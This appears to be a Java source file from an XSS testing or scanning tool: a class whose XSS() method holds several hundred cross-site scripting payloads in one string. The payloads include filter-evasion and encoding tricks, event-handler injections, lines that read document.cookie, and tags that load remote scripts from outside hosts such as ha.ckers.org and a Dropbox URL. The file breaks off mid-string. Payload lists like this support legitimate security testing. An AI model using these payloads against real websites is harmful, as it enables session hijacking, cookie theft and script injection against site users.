/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package payload;

import java.util.ArrayList;

/**
 *
 * @author Shaco JX
 */
public class A3p_5 {

    public ArrayList<String> XSS() {
        ArrayList<String> list = new ArrayList<>();
        String payload = "<iframe xmlns=\"#\" src=\"javascript:alert(1)\"></iframe>\n"
                + "+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\n"
                + "%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\n"
                + "+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\n"
                + "%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\n"
                + "%253cscript%253ealert(document.cookie)%253c/script%253e\n"
                + "“><s”%2b”cript>alert(document.cookie)</script>\n"
                + "“><ScRiPt>alert(document.cookie)</script>\n"
                + "“><<script>alert(document.cookie);//<</script>\n"
                + "foo<script>alert(document.cookie)</script>\n"
                + "<scr<script>ipt>alert(document.cookie)</scr</script>ipt>\n"
                + "%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E\n"
                + "‘; alert(document.cookie); var foo=’\n"
                + "foo\\’; alert(document.cookie);//’;\n"
                + "</script><script >alert(document.cookie)</script>\n"
                + "<img src=asdf onerror=alert(document.cookie)>\n"
                + "<BODY ONLOAD=alert(’XSS’)>\n"
                + "<script>alert(1)</script>\n"
                + "\"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>\n"
                + "<video src=1 onerror=alert(1)>\n"
                + "<audio src=1 onerror=alert(1)>\n"
                + "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n"
                + "'';!--\"<XSS>=&{()}\n"
                + "0\\\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>\"-confirm(3)-\"\n"
                + "<script/src=data:,alert()>\n"
                + "<marquee/onstart=alert()>\n"
                + "<video/poster/onerror=alert()>\n"
                + "<isindex/autofocus/onfocus=alert()>\n"
                + "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\n"
                + "<IMG SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG SRC=javascript:alert('XSS')>\n"
                + "<IMG SRC=JaVaScRiPt:alert('XSS')>\n"
                + "<IMG SRC=javascript:alert(\"XSS\")>\n"
                + "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n"
                + "<a onmouseover=\"alert(document.cookie)\">xxs link</a>\n"
                + "<a onmouseover=alert(document.cookie)>xxs link</a>\n"
                + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n"
                + "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n"
                + "<IMG SRC=# onmouseover=\"alert('xxs')\">\n"
                + "<IMG SRC= onmouseover=\"alert('xxs')\">\n"
                + "<IMG onmouseover=\"alert('xxs')\">\n"
                + "<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>\n"
                + "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;\n"
                + "&#39;&#88;&#83;&#83;&#39;&#41;>\n"
                + "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&\n"
                + "#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n"
                + "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n"
                + "<IMG SRC=\"jav	ascript:alert('XSS');\">\n"
                + "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n"
                + "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n"
                + "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\n"
                + "<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n"
                + "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n"
                + "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n"
                + "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\n"
                + "<SCRIPT SRC=//ha.ckers.org/.j>\n"
                + "<IMG SRC=\"javascript:alert('XSS')\"\n"
                + "<iframe src=http://ha.ckers.org/scriptlet.html <\n"
                + "\\\";alert('XSS');//\n"
                + "</script><script>alert('XSS');</script>\n"
                + "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n"
                + "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n"
                + "<BODY BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<IMG DYNSRC=\"javascript:alert('XSS')\">\n"
                + "<IMG LOWSRC=\"javascript:alert('XSS')\">\n"
                + "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>\n"
                + "<IMG SRC='vbscript:msgbox(\"XSS\")'>\n"
                + "<IMG SRC=\"livescript:[code]\">\n"
                + "<BODY ONLOAD=alert('XSS')>\n"
                + "<BGSOUND SRC=\"javascript:alert('XSS');\">\n"
                + "<BR SIZE=\"&{alert('XSS')}\">\n"
                + "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\n"
                + "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">\n"
                + "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>\n"
                + "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">\n"
                + "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>\n"
                + "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\n"
                + "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\n"
                + "exp/*<A STYLE='no\\xss:noxss(\"*//*\");\n"
                + "xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>\n"
                + "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>\n"
                + "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>\n"
                + "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n"
                + "<XSS STYLE=\"xss:expression(alert('XSS'))\">\n"
                + "<XSS STYLE=\"behavior: url(xss.htc);\">\n"
                + "¼script¾alert(¢XSS¢)¼/script¾\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">\n"
                + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n"
                + "<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>\n"
                + "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n"
                + "<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n"
                + "<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">\n"
                + "<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">\n"
                + "<DIV STYLE=\"width: expression(alert('XSS'));\">\n"
                + "<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->\n"
                + "<BASE HREF=\"javascript:alert('XSS');//\">\n"
                + "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>\n"
                + "<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->\n"
                + "<? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>\n"
                + "<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">\n"
                + "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">\n"
                + "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n"
                + "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<A HREF=\"http://66.102.7.147/\">XSS</A>\n"
                + "0\\\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>\"-confirm(3)-\"\n"
                + "veris-->group<svg/onload=alert(/XSS/)//\n"
                + "#\"><img src=M onerror=alert('XSS');>\n"
                + "element[attribute='<img src=x onerror=alert('XSS');>\n"
                + "[<blockquote cite=\"]\">[\" onmouseover=\"alert('RVRSH3LL_XSS');\" ]\n"
                + "%22;alert%28%27RVRSH3LL_XSS%29//\n"
                + "javascript:alert%281%29;\n"
                + "<w contenteditable id=x onfocus=alert()>\n"
                + "alert;pg(\"XSS\")\n"
                + "<svg/onload=%26%23097lert%26lpar;1337)>\n"
                + "<script>for((i)in(self))eval(i)(1)</script>\n"
                + "<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>\n"
                + "<sCR<script>iPt>alert(1)</SCr</script>IPt>\n"
                + "<a href=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">test</a>\n"
                + "%253Cscript%253Ealert('XSS')%253C%252Fscript%253E\n"
                + "<IMG SRC=x onload=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onafterprint=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onbeforeprint=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onbeforeunload=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onerror=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onhashchange=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onload=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onmessage=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ononline=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onoffline=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onpagehide=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onpageshow=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onpopstate=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onresize=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onstorage=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onunload=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onblur=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onchange=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oncontextmenu=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oninput=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oninvalid=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onreset=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onsearch=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onselect=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onsubmit=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onkeydown=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onkeypress=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onkeyup=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onclick=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondblclick=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onmousedown=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onmousemove=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onmouseout=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onmouseover=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onmouseup=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onmousewheel=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onwheel=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondrag=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondragend=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondragenter=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondragleave=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondragover=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondragstart=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondrop=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onscroll=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oncopy=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oncut=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onpaste=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onabort=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oncanplay=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oncanplaythrough=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x oncuechange=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ondurationchange=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onemptied=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onended=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onerror=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onloadeddata=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onloadedmetadata=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onloadstart=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onpause=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onplay=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onplaying=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onprogress=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onratechange=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onseeked=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onseeking=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onstalled=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onsuspend=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ontimeupdate=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onvolumechange=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onwaiting=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x onshow=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<IMG SRC=x ontoggle=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=\"alert(1)\";\n"
                + "<IMG SRC=x onload=\"alert(String.fromCharCode(88,83,83))\">\n"
                + "<INPUT TYPE=\"BUTTON\" action=\"alert('XSS')\"/>\n"
                + "\"><h1><IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\">123</h1>\n"
                + "\"><h1><IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>\n"
                + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n"
                + "<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>\n"
                + "\"><h1><IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>\n"
                + "\"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder=\"0%EF%BB%BF\n"
                + "\"><h1><IFRAME width=\"420\" height=\"315\" SRC=\"http://www.youtube.com/embed/sxvccpasgTE\" frameborder=\"0\" onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>\n"
                + "\"><h1><iframe width=\"420\" height=\"315\" src=\"http://www.youtube.com/embed/sxvccpasgTE\" frameborder=\"0\" allowfullscreen></iframe>123</h1>\n"
                + "><h1><IFRAME width=\"420\" height=\"315\" frameborder=\"0\" onmouseover=\"document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr\n"
                + "g'\"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250\n"
                + "<IFRAME width=\"420\" height=\"315\" frameborder=\"0\" onload=\"alert(document.cookie)\"></IFRAME>\n"
                + "\"><h1><IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\">123</h1>\n"
                + "\"><h1><IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>123</h1>\n"
                + "<iframe src=http://xss.rocks/scriptlet.html <\n"
                + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n"
                + "<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>\n"
                + "<iframe  src=\"&Tab;javascript:prompt(1)&Tab;\">\n"
                + "<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'\n"
                + "<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"\n"
                + "<sVg><scRipt >alert&lpar;1&rpar; {Opera}\n"
                + "<img/src=`` onerror=this.onerror=confirm(1) \n"
                + "<form><isindex formaction=\"javascript&colon;confirm(1)\"\n"
                + "<img src=``&NewLine; onerror=alert(1)&NewLine;\n"
                + "<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>\n"
                + "<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\n"
                + "<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">\n"
                + "<script /**/>/**/alert(1)/**/</script /**/\n"
                + "&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>\n"
                + "<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">\n"
                + "<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>\n"
                + "<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script\n"
                + "<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}\n"
                + "<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">\n"
                + "<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\n"
                + "<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X</script><img/*/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/*/onerror='eval(src)'>\n"
                + "<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\n"
                + "<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(1)\"&#11;&#10;&#09;;>\n"
                + "<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a\n"
                + "http://www.google<script .com>alert(document.location)</script\n"
                + "<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a\n"
                + "<img/src=@&#32;&#13; onerror = prompt('&#49;')\n"
                + "<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;\n"
                + "<script ^__^>alert(String.fromCharCode(49))</script ^__^\n"
                + "</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\n"
                + "&#00;</form><input type&#61;\"date\" onfocus=\"alert(1)\">\n"
                + "<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>\n"
                + "<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/\n"
                + "<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>\n"
                + "<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\n"
                + "<script ~~~>alert(0%0)</script ~~~>\n"
                + "<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\n"
                + "<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN\n"
                + "<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)\n"
                + "&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'\n"
                + "&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\n"
                + "<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^\n"
                + "<div/style=\"width:expression(confirm(1))\">X</div> {IE7}\n"
                + "<iframe// src=javaSCRIPT&colon;alert(1)\n"
                + "//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//\n"
                + "/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>\n"
                + "//|\\\\ <script //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\\\ </script //|\\\\\n"
                + "</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>\n"
                + "<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">\n"
                + "</plaintext\\></|\\><plaintext/onmouseover=prompt(1)\n"
                + "</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}\n"
                + "<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n"
                + "<div onmouseover='alert&lpar;1&rpar;'>DIV</div>\n"
                + "<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n"
                + "<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>\n"
                + "<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n"
                + "<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n"
                + "<var onmouseover=\"prompt(1)\">On Mouse Over</var>\n"
                + "<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\n"
                + "<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n"
                + "<%<!--'%><script>alert(1);</script -->\n"
                + "<script src=\"data:text/javascript,alert(1)\"></script>\n"
                + "<iframe/src \\/\\/onload = prompt(1)\n"
                + "<iframe/onreadystatechange=alert(1)\n"
                + "<svg/onload=alert(1)\n"
                + "<input value=<><iframe/src=javascript:confirm(1)\n"
                + "<input type=\"text\" value=`` <div/onmouseover='alert(1)'>X</div>\n"
                + "http://www.<script>alert(1)</script .com\n"
                + "<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\n"
                + "<svg><script ?>alert(1)\n"
                + "<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n"
                + "<img src=`xx:xx`onerror=alert(1)>\n"
                + "<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n"
                + "<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>\n"
                + "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n"
                + "<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>\n"
                + "<svg contentScriptType=text/vbs><script>MsgBox+1\n"
                + "<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n"
                + "<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n"
                + "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n"
                + "<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n"
                + "<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script\n"
                + "<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n"
                + "<script>+-+-1-+-+alert(1)</script>\n"
                + "<body/onload=&lt;!--&gt;&#10alert(1)>\n"
                + "<script itworksinallbrowsers>/*<script* */alert(1)</script\n"
                + "<img src ?itworksonchrome?\\/onerror = alert(1)\n"
                + "<svg><script>//&NewLine;confirm(1);</script </svg>\n"
                + "<svg><script onlypossibleinopera:-)> alert(1)\n"
                + "<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n"
                + "<script x> alert(1) </script 1=2\n"
                + "<div/onmouseover='alert(1)'> style=\"x:\">\n"
                + "<--`<img/src=` onerror=alert(1)> --!>\n"
